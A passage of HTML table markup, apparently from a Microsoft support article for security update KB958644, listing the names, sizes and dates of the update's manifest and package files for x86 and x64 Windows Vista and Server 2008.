class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,412</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,410</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,429</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,414</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,493</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_36258762845e107951bd9aa6bb6e2cf2_31bf3856ad364e35_6.0.6000.20937_none_1b3e8fbe3df577d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_839cbb983f595ac76fde121c813c640b_31bf3856ad364e35_6.0.6000.16764_none_c31a32b5eaec82f7.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_8beec6c9c4e53ad3ad4e2eefee83c7bb_31bf3856ad364e35_6.0.6001.22288_none_24746e8695e50ab0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_cf5fc08aa887a883eefd054adf032c14_31bf3856ad364e35_6.0.6001.18157_none_f5617edb87321701.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:29</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><br/><span class=\"text-base\">Additional files for all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_016ff16d0fb7adfd32cc8cac619f7020_31bf3856ad364e35_6.0.6001.22288_none_63879e5572c63a8d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_17b51416d1f0879bd01802235d17e183_31bf3856ad364e35_6.0.6001.18157_none_059d2147a43b46c0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_4a708e10febe190d564ab30203394f1c_31bf3856ad364e35_6.0.6000.16764_none_7838dfe143478799.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">700</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_67941fc4deac88f98600b6aa3d634fa5_31bf3856ad364e35_6.0.6001.18157_none_7700084c05e335ee.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">700</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_73aa7275aac93043dad7f68b22dc689e_31bf3856ad364e35_6.0.6000.20937_none_8d173e2dc1c0db98.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">700</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_854c9ca1f90fdf0fef990f5d99c75b11_31bf3856ad364e35_6.0.6001.22288_none_48ff81aaf19bff94.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">700</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_c889ea7b0835e36fc67c4ccc4ec07ed3_31bf3856ad364e35_6.0.6000.16764_none_c5bae36e7a056bed.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_f9502c7e5f482bc6c92ce8f63becff94_31bf3856ad364e35_6.0.6000.20937_none_c14b7e8f3e6dce2d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_e72f9b76bcf3c8a0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,067</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:21</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_e7dcaac9d5f65dc3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,067</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_e923aae6ba0f89a5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,067</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_e98dd837d3449699.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,067</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:38</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,753</td></tr><tr 